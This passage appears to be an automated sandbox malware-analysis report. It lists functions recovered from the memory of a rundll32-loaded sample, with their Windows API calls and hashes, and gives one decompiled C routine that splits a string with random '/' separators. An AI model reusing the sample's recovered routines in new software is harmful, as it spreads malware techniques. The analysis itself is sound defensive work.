                              • Part of subcall function 04F7B9E9: HeapFree.KERNEL32(00000000,04F70971,?,04F70971,00000000,?,04F6C1F8,00000000), ref: 04F7BAA4
                              • Part of subcall function 04F7B9E9: CloseHandle.KERNEL32(04F70971,?,00000001,?,04F70971), ref: 04F7BAB6
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CloseCreateHandleMappinglstrlen$CountFreeHeapOpenSizeTicklstrcpymemset
                            • String ID:
                            • API String ID: 3239194699-0
                            • Opcode ID: 1d11a76d2a4fe5c4d6c10bbe858048cdd03a24d0c04fb479bf47c5d98830b2ce
                            • Instruction ID: 184e68efce970fd26b9a38c2e2f70db61f266abc3ded40ee4f323b1157524bb0
                            • Opcode Fuzzy Hash: 1d11a76d2a4fe5c4d6c10bbe858048cdd03a24d0c04fb479bf47c5d98830b2ce
                            • Instruction Fuzzy Hash: 11215A3190020DFBEB21DF65DD44DEEBBB8FF44358F14012AFA26961A0D735A91ACB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F82968 Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                            Download Yara Rule
                            APIs
                            • RtlEnterCriticalSection.NTDLL(0631C2D0), ref: 04F8297E
                            • RtlLeaveCriticalSection.NTDLL(0631C2D0), ref: 04F82999
                            • GetLastError.KERNEL32 ref: 04F82A07
                            • GetLastError.KERNEL32 ref: 04F82A16
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CriticalErrorLastSection$EnterLeave
                            • String ID:
                            • API String ID: 2124651672-0
                            • Opcode ID: 2f51803c16d3c929875bdc5f9ad5aafca537ab3b53079c1204cf007793cab428
                            • Instruction ID: 7ca90ffc73f8b30f2871f3bcae9d098ee172dba5987aafec9884535598c960f0
                            • Opcode Fuzzy Hash: 2f51803c16d3c929875bdc5f9ad5aafca537ab3b53079c1204cf007793cab428
                            • Instruction Fuzzy Hash: 18214D32900609EFCB11DF94D945AAE7BB4FF04720F11415DF816AA250D739FD129B91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F67D47 Relevance: 6.1, APIs: 4, Instructions: 70fileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 04F6A698: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,04F67D5E), ref: 04F6A6BE
                            • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,?,00000000,?,00000000,00000000,00000000,?,00000000), ref: 04F67D99
                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,04F6C556,?), ref: 04F67DAB
                            • ReadFile.KERNEL32(?,?,00000004,?,00000000,?,?,?,?,?,04F6C556,?), ref: 04F67DC3
                            • CloseHandle.KERNEL32(?,?,?,?,?,?,04F6C556,?), ref: 04F67DDE
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CloseCreateHandleModuleNamePointerRead
                            • String ID:
                            • API String ID: 1352878660-0
                            • Opcode ID: e1a57fe475a5b81fae1b2dfad2484b4e50e1435f6d11a8542337850fba990af6
                            • Instruction ID: 4b74db49c401beccf2af382a6762d902a1f5f833e222552b6a4195bbf2d6c66e
                            • Opcode Fuzzy Hash: e1a57fe475a5b81fae1b2dfad2484b4e50e1435f6d11a8542337850fba990af6
                            • Instruction Fuzzy Hash: 24116071A01118BBEF21AE65DC88EFF7EACEF01758F104556F906E5090D775AA41CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F81C9B Relevance: 6.1, APIs: 4, Instructions: 68stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlenW.KERNEL32(?,00000000,761F8250,761B69A0,?,?,?,04F666C0,?,00000000,?), ref: 04F81CAB
                              • Part of subcall function 04F69394: RtlAllocateHeap.NTDLL(00000000,?,04F70051), ref: 04F693A0
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000001,00000000,00000000,00000001,?,?,?,04F666C0,?,00000000,?), ref: 04F81CCD
                            • lstrcpyW.KERNEL32(00000000,?), ref: 04F81CF9
                            • lstrcatW.KERNEL32(00000000,?), ref: 04F81D0C
                              • Part of subcall function 04F6B83F: strstr.NTDLL ref: 04F6B917
                              • Part of subcall function 04F6B83F: strstr.NTDLL ref: 04F6B96A
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: strstr$AllocateByteCharHeapMultiWidelstrcatlstrcpylstrlen
                            • String ID:
                            • API String ID: 3712611166-0
                            • Opcode ID: 538e28c12286523dd46d583defea74b5db13b01e25088a44ef331fffb0bd6272
                            • Instruction ID: 0860e8c5609a93c6c8588d786c5dde2171132a660e8ed10a93264120b309ab51
                            • Opcode Fuzzy Hash: 538e28c12286523dd46d583defea74b5db13b01e25088a44ef331fffb0bd6272
                            • Instruction Fuzzy Hash: 4B114976900519BFDB11AFA5DD88DEF7FACEF09258B004569F9059B110E738EE02CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F6A253 Relevance: 6.1, APIs: 4, Instructions: 68stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlen.KERNEL32(?,?), ref: 04F6A28B
                              • Part of subcall function 04F69394: RtlAllocateHeap.NTDLL(00000000,?,04F70051), ref: 04F693A0
                            • lstrcpy.KERNEL32(00000000,?), ref: 04F6A2A2
                            • StrChrA.SHLWAPI(00000000,0000002E), ref: 04F6A2AB
                            • GetModuleHandleA.KERNEL32(00000000), ref: 04F6A2C9
                              • Part of subcall function 04F68C35: VirtualProtect.KERNEL32(00000000,00000005,00000040,00000040,00000000,00000005,?,?,?,?,?,00000000,00000004,?,?,80000000), ref: 04F68D0D
                              • Part of subcall function 04F68C35: VirtualProtect.KERNEL32(?,00000004,?,?,?,?,00000000,00000004,?,?,80000000,00000000,00000001,04F860B0,0000001C,04F7BE61), ref: 04F68D28
                              • Part of subcall function 04F68C35: RtlEnterCriticalSection.NTDLL(04F8A400), ref: 04F68D4D
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: ProtectVirtual$AllocateCriticalEnterHandleHeapModuleSectionlstrcpylstrlen
                            • String ID:
                            • API String ID: 105881616-0
                            • Opcode ID: e672e2db084d25592165123cc6decdbc4051063e9ba176e5c5f90c75954dd850
                            • Instruction ID: 7cb4f9f1b80171bcf4e657588b741b8b10160d94d951f6ef617cfcd64d1f0171
                            • Opcode Fuzzy Hash: e672e2db084d25592165123cc6decdbc4051063e9ba176e5c5f90c75954dd850
                            • Instruction Fuzzy Hash: F9214F74E40309EFDB11DFA8C949AAEBBF8EF46304F108059E406AB250DB75E942DB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F81D47 Relevance: 6.1, APIs: 4, Instructions: 67registryCOMMON
                            Download Yara Rule
                            APIs
                            • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 04F81D62
                            • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?), ref: 04F81D86
                            • RegCloseKey.ADVAPI32(?), ref: 04F81DDE
                              • Part of subcall function 04F69394: RtlAllocateHeap.NTDLL(00000000,?,04F70051), ref: 04F693A0
                            • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000), ref: 04F81DAF
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: QueryValue$AllocateCloseHeapOpen
                            • String ID:
                            • API String ID: 453107315-0
                            • Opcode ID: b94ac548cc71945bea0b5645cd5344a6be00d36ffe8e0cb36223a3d3bbc07b35
                            • Instruction ID: 3b023706250e919a28938b500f6ea092a23bbefc0a79448696e695a01435eb97
                            • Opcode Fuzzy Hash: b94ac548cc71945bea0b5645cd5344a6be00d36ffe8e0cb36223a3d3bbc07b35
                            • Instruction Fuzzy Hash: F221D8B690010CFFDF11EF95DD84DEE7BB9EB88340F20855AE801AA210E771AA52DB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F6263B Relevance: 6.1, APIs: 4, Instructions: 61memorystringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04F7EAA8,00000000,?,00000000,04F6E842,00000000,0631C310), ref: 04F62646
                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 04F6265E
                            • memcpy.NTDLL(00000000,?,-00000008,?,?,?,04F7EAA8,00000000,?,00000000,04F6E842,00000000,0631C310), ref: 04F626A2
                            • memcpy.NTDLL(00000001,?,00000001,?,?,?), ref: 04F626C3
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: memcpy$AllocateHeaplstrlen
                            • String ID:
                            • API String ID: 1819133394-0
                            • Opcode ID: 1439742c54ed8c040afa0f3ae0069549075ea3d8c6bb46573850ee65de6963aa
                            • Instruction ID: a569fe08d98a68e5db8760eaa2681ffb2eda1e3d84dcf312097858ca7256e08f
                            • Opcode Fuzzy Hash: 1439742c54ed8c040afa0f3ae0069549075ea3d8c6bb46573850ee65de6963aa
                            • Instruction Fuzzy Hash: 3D112972E00219BFD7108E69EC84DAEBBEEDB81250B05417AF505DB140E7759E0587A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04A14162 Relevance: 6.1, APIs: 4, Instructions: 61memorystringCOMMON
                            Download Yara Rule
                            C-Code - Quality: 68%
                            			E04A14162(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0x4a1a2d8, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0x4a1a2f0; // 0xba3a044c
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0x4a1a2f0 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

















                            0x04a1416a
                            0x04a1416d
                            0x04a14173
                            0x04a1418b
                            0x04a1418d
                            0x04a14192
                            0x04a14194
                            0x04a14197
                            0x04a14199
                            0x04a1419c
                            0x04a1419e
                            0x04a1419e
                            0x04a141a0
                            0x04a141ab
                            0x04a141b0
                            0x04a141c1
                            0x04a141c9
                            0x04a141ce
                            0x04a141d1
                            0x04a141d4
                            0x04a141d6
                            0x04a141d9
                            0x04a141dc
                            0x04a141dc
                            0x04a141df
                            0x04a141ea
                            0x04a141ef
                            0x04a141f9

                            APIs
                            • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04A11DC6,00000000,?,746BC740,04A158D7,00000000,055395B0), ref: 04A1416D
                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 04A14185
                            • memcpy.NTDLL(00000000,055395B0,-00000008,?,?,?,04A11DC6,00000000,?,746BC740,04A158D7,00000000,055395B0), ref: 04A141C9
                            • memcpy.NTDLL(00000001,055395B0,00000001,04A158D7,00000000,055395B0), ref: 04A141EA
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: memcpy$AllocateHeaplstrlen
                            • String ID:
                            • API String ID: 1819133394-0
                            • Opcode ID: 978430c92032837088e9af7dc39de2817d8e568dfe6ba7992ccea85126ac8bc7
                            • Instruction ID: cd99169743a8451e907927565ca43eabbb2309bba0910a36e274cafe03dde240
                            • Opcode Fuzzy Hash: 978430c92032837088e9af7dc39de2817d8e568dfe6ba7992ccea85126ac8bc7
                            • Instruction Fuzzy Hash: A31159B2A00214BFE7108F69DC84D9E7FEEEB943A0B050176F404CB160E7759E05C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F721FE Relevance: 6.1, APIs: 4, Instructions: 58threadCOMMON
                            Download Yara Rule
                            APIs
                            • GlobalFix.KERNEL32(00000000), ref: 04F7223E
                            • memset.NTDLL ref: 04F72252
                            • GetWindowThreadProcessId.USER32(00000000,?), ref: 04F7225F
                              • Part of subcall function 04F7C563: OpenProcess.KERNEL32(00000410,B8F475FF,04F72289,00000000,00000000,04F72289,0000001C,00000000,00000000,?,?,?,04F72289), ref: 04F7C5BD
                              • Part of subcall function 04F7C563: CloseHandle.KERNEL32(00000000,00000000,00000000,04F72299,00000104,?,?,?,04F72289), ref: 04F7C5DB
                              • Part of subcall function 04F7C563: GetSystemTimeAsFileTime.KERNEL32(04F72289), ref: 04F7C643
                            • GlobalUnWire.KERNEL32(00000000), ref: 04F7228A
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: GlobalProcessTime$CloseFileHandleOpenSystemThreadWindowWirememset
                            • String ID:
                            • API String ID: 3286078456-0
                            • Opcode ID: b86933e08e7c60a825dede94570072097c66d784748fcd724fb6777ac63cb608
                            • Instruction ID: 8bba6de4effe3075c7dc95182a6208b3238b17fc34534c05e62cfa5e574e311f
                            • Opcode Fuzzy Hash: b86933e08e7c60a825dede94570072097c66d784748fcd724fb6777ac63cb608
                            • Instruction Fuzzy Hash: 4E1177B6D00209ABDB119BB5EC48BBEB7BCEB08701F04415BE945F5240DB78D902CB65
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F81C1F Relevance: 6.1, APIs: 4, Instructions: 57COMMON
                            Download Yara Rule
                            APIs
                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000001,?,?,?,04F6AE46,00000000,00000000), ref: 04F81C3D
                            • GetLastError.KERNEL32(?,?,?,04F6AE46,00000000,00000000,00000000,00000000,0000001E,0000001E,?,?,?,04F6EBC1,?,0000001E), ref: 04F81C45
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: ByteCharErrorLastMultiWide
                            • String ID:
                            • API String ID: 203985260-0
                            • Opcode ID: 7d5782a9993608ce7441e4234443a44a0b0ffaf3434f414986ae21d7616ea3f7
                            • Instruction ID: e17e2f83908325e599ce83143fb4c171158c9f83a6b41bd9baa15ed5233b4b0c
                            • Opcode Fuzzy Hash: 7d5782a9993608ce7441e4234443a44a0b0ffaf3434f414986ae21d7616ea3f7
                            • Instruction Fuzzy Hash: B501D4326082557FC721BA769C4CCBBBB6CEBC7760B100B1DF8659A280D6206802C670
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F627E0 Relevance: 6.1, APIs: 4, Instructions: 56stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlen.KERNEL32(?,?,?,00000000,?,?,04F61D09,?,?,?,?,?,?,?,?,?), ref: 04F627F4
                              • Part of subcall function 04F69394: RtlAllocateHeap.NTDLL(00000000,?,04F70051), ref: 04F693A0
                            • mbstowcs.NTDLL ref: 04F6280E
                            • lstrlen.KERNEL32(?), ref: 04F62819
                            • mbstowcs.NTDLL ref: 04F62833
                              • Part of subcall function 04F7BAD1: lstrlenW.KERNEL32(?,00000000,00000001,?,00000250,?,00000000), ref: 04F7BB1D
                              • Part of subcall function 04F7BAD1: lstrlenW.KERNEL32(?,?,00000000), ref: 04F7BB29
                              • Part of subcall function 04F7BAD1: memset.NTDLL ref: 04F7BB71
                              • Part of subcall function 04F7BAD1: FindFirstFileW.KERNEL32(00000000,00000000), ref: 04F7BB8C
                              • Part of subcall function 04F7BAD1: lstrlenW.KERNEL32(0000002C), ref: 04F7BBC4
                              • Part of subcall function 04F7BAD1: lstrlenW.KERNEL32(?), ref: 04F7BBCC
                              • Part of subcall function 04F7BAD1: memset.NTDLL ref: 04F7BBEF
                              • Part of subcall function 04F7BAD1: wcscpy.NTDLL ref: 04F7BC01
                              • Part of subcall function 04F7E803: RtlFreeHeap.NTDLL(00000000,?,04F73953,?,?,04F7BF5B,00000000,00000000,04F610B0,00000000,04F89F2C,00000008,00000003), ref: 04F7E80F
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$Heapmbstowcsmemset$AllocateFileFindFirstFreewcscpy
                            • String ID:
                            • API String ID: 1961997177-0
                            • Opcode ID: 1cf13c300fcce7b8e1042a64b25bc22ce52433d428d8c27eaf4342e362bdd353
                            • Instruction ID: 1507a46684d5ea4f55ba8bbc4dd7b4eb11327539bdba993f82e675c6e6474edb
                            • Opcode Fuzzy Hash: 1cf13c300fcce7b8e1042a64b25bc22ce52433d428d8c27eaf4342e362bdd353
                            • Instruction Fuzzy Hash: 0701B573900204B7EF11ABA5DC85F8F7BACDF84754F104467B515A7141EA79E91287A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F7E03B Relevance: 6.1, APIs: 4, Instructions: 54memorystringtimeCOMMON
                            Download Yara Rule
                            APIs
                            • GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,04F70D10,?,00000000,00000000), ref: 04F7E04E
                            • lstrlen.KERNEL32(0631C178,?,04F70D10,?,00000000,00000000), ref: 04F7E06F
                            • RtlAllocateHeap.NTDLL(00000000,00000014), ref: 04F7E087
                            • lstrcpy.KERNEL32(00000000,0631C178), ref: 04F7E099
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Time$AllocateFileHeapSystemlstrcpylstrlen
                            • String ID:
                            • API String ID: 1929783139-0
                            • Opcode ID: 2e92660752d67dbedc8a557eb1d7e5dd6a1e45faf8b2874b4c338c6fb5283e82
                            • Instruction ID: b88725472abccce710380a12102de945cacb13e2aa0e4cf1f149ccb6a133be98
                            • Opcode Fuzzy Hash: 2e92660752d67dbedc8a557eb1d7e5dd6a1e45faf8b2874b4c338c6fb5283e82
                            • Instruction Fuzzy Hash: C3018876D00249FFD7119FA8AC44E6F7FBCEB49305F14416AE906D7241D638D905CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F61B71 Relevance: 6.1, APIs: 4, Instructions: 54memorystringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlen.KERNEL32(?), ref: 04F61B7E
                            • RtlAllocateHeap.NTDLL(00000000,00000015), ref: 04F61BA4
                            • lstrcpy.KERNEL32(00000014,?), ref: 04F61BC9
                            • memcpy.NTDLL(?,?,?), ref: 04F61BD6
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeaplstrcpylstrlenmemcpy
                            • String ID:
                            • API String ID: 1388643974-0
                            • Opcode ID: 346fa67cddac6d1f6c06b8a314880c465812f1f4aaf78531d3e274096850e3ec
                            • Instruction ID: daa2e73012d80a1805cf759c82282610f42f616d57b156ce06dab244b8b0dfef
                            • Opcode Fuzzy Hash: 346fa67cddac6d1f6c06b8a314880c465812f1f4aaf78531d3e274096850e3ec
                            • Instruction Fuzzy Hash: 7D115B7190020AEFC721CF58E944E9ABBF8FF48704F14845EF85A9B210D775E905DB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F79E10 Relevance: 6.0, APIs: 4, Instructions: 50memorystringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlen.KERNEL32(?,76ECD3B0,?,761B5520,04F6B697,00000000,?,?,?,7620F710,00000000,00000000), ref: 04F79E17
                            • RtlAllocateHeap.NTDLL(00000000,0000000D), ref: 04F79E2F
                            • memcpy.NTDLL(0000000C,?,00000001), ref: 04F79E45
                              • Part of subcall function 04F6A8E9: StrChrA.SHLWAPI(00000020,?,76ECD3B0,0631C304,00000000,?,04F66584,?), ref: 04F6A90E
                              • Part of subcall function 04F6A8E9: StrTrimA.SHLWAPI(00000020,04F85FCC,00000000,?,04F66584,?), ref: 04F6A92D
                              • Part of subcall function 04F6A8E9: StrChrA.SHLWAPI(00000020,?,?,04F66584,?), ref: 04F6A939
                            • HeapFree.KERNEL32(00000000,00000000,0000000C,00000020,00000000), ref: 04F79E77
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateFreeTrimlstrlenmemcpy
                            • String ID:
                            • API String ID: 3208927540-0
                            • Opcode ID: cc9ba1e041a034a550982d6483dbc32b6d3670ca81aab1331b68f5c7bb105e86
                            • Instruction ID: ca1a7cac26a63ce3d601c02c530162beb78c6a3e7e76b6ced96401ca130f14e1
                            • Opcode Fuzzy Hash: cc9ba1e041a034a550982d6483dbc32b6d3670ca81aab1331b68f5c7bb105e86
                            • Instruction Fuzzy Hash: E8018472B00706ABF3215E52EC44F3B7BA8EB80B55F04402AF65999080D7B8AC1AA660
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F75261 Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 04F69394: RtlAllocateHeap.NTDLL(00000000,?,04F70051), ref: 04F693A0
                            • RtlInitializeCriticalSection.NTDLL(04F8A400), ref: 04F75285
                            • RtlInitializeCriticalSection.NTDLL(04F8A3E0), ref: 04F7529B
                            • GetVersion.KERNEL32(?,?,?,?,?,?,?,04F69100,?,?,?,?,?), ref: 04F752AC
                            • GetModuleHandleA.KERNEL32(00001683,?,?,?,?,?,?,?,04F69100,?,?,?,?,?), ref: 04F752E0
                              • Part of subcall function 04F768AC: GetModuleHandleA.KERNEL32(?,00000001,774B9EB0,00000000,?,?,?,?,00000000,04F752C3), ref: 04F768C4
                              • Part of subcall function 04F768AC: LoadLibraryA.KERNEL32(?), ref: 04F76965
                              • Part of subcall function 04F768AC: FreeLibrary.KERNEL32(00000000), ref: 04F76970
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CriticalHandleInitializeLibraryModuleSection$AllocateFreeHeapLoadVersion
                            • String ID:
                            • API String ID: 1711133254-0
                            • Opcode ID: affd0150b78fca2012f53f9e6befa1e49a31862d602d40c86015863e93bbc9fd
                            • Instruction ID: f2ba666274da878f328ebcd39bc8ad37ad006c44c534eb2f71041b60a55194e5
                            • Opcode Fuzzy Hash: affd0150b78fca2012f53f9e6befa1e49a31862d602d40c86015863e93bbc9fd
                            • Instruction Fuzzy Hash: 4E118CB2E4071CABE710AFB9B884A253BE5F78A314700152FE205DF200D7BDAC468F80
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F62530 Relevance: 6.0, APIs: 4, Instructions: 49sleepCOMMON
                            Download Yara Rule
                            APIs
                            • RtlEnterCriticalSection.NTDLL(04F8A428), ref: 04F6253B
                            • Sleep.KERNEL32(0000000A), ref: 04F62545
                            • SetEvent.KERNEL32 ref: 04F6259C
                            • RtlLeaveCriticalSection.NTDLL(04F8A428), ref: 04F625BB
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CriticalSection$EnterEventLeaveSleep
                            • String ID:
                            • API String ID: 1925615494-0
                            • Opcode ID: ac1a451b2ae28d33aa37b23b9e2f354c9836eeeeaba3bd6f394b9187e24e77f5
                            • Instruction ID: b290296bfe15ccc37460bf45be9e01e2cee8680d2b0c306293afda6d5d0ae5ea
                            • Opcode Fuzzy Hash: ac1a451b2ae28d33aa37b23b9e2f354c9836eeeeaba3bd6f394b9187e24e77f5
                            • Instruction Fuzzy Hash: 9B019670A40209FBE710AF61FC59F6A3BA9EB04705F00401AE606DE080D678AD058BA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F67BD8 Relevance: 6.0, APIs: 4, Instructions: 48fileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 04F80DDD: lstrlen.KERNEL32(?,?,00000000,04F67BEE), ref: 04F80DE2
                              • Part of subcall function 04F80DDD: RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 04F80DF7
                              • Part of subcall function 04F80DDD: wsprintfA.USER32 ref: 04F80E13
                              • Part of subcall function 04F80DDD: HeapFree.KERNEL32(00000000,00000000,00000000,000000FF), ref: 04F80E2F
                            • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 04F67C06
                            • GetFileSize.KERNEL32(00000000,00000000), ref: 04F67C15
                            • CloseHandle.KERNEL32(00000000), ref: 04F67C1F
                            • GetLastError.KERNEL32 ref: 04F67C27
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: FileHeap$AllocateCloseCreateErrorFreeHandleLastSizelstrlenwsprintf
                            • String ID:
                            • API String ID: 4042893638-0
                            • Opcode ID: ef50fb05b50ee7bfcc2cb2511af1ccd9e8702e4e259c42954e6b93c23518fc69
                            • Instruction ID: a274948deab70e5fa881c223a231fd19aa5d01b1bdd329a44fc0bb2d02d88e71
                            • Opcode Fuzzy Hash: ef50fb05b50ee7bfcc2cb2511af1ccd9e8702e4e259c42954e6b93c23518fc69
                            • Instruction Fuzzy Hash: 40F02D725002187BE7103F65EC8CF6F7E9CEF05769F204119F50BE9180D674654287E0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F688FA Relevance: 6.0, APIs: 4, Instructions: 41memorystringCOMMON
                            Download Yara Rule
                            APIs
                            • InterlockedExchange.KERNEL32(04F8A060,00000000), ref: 04F68906
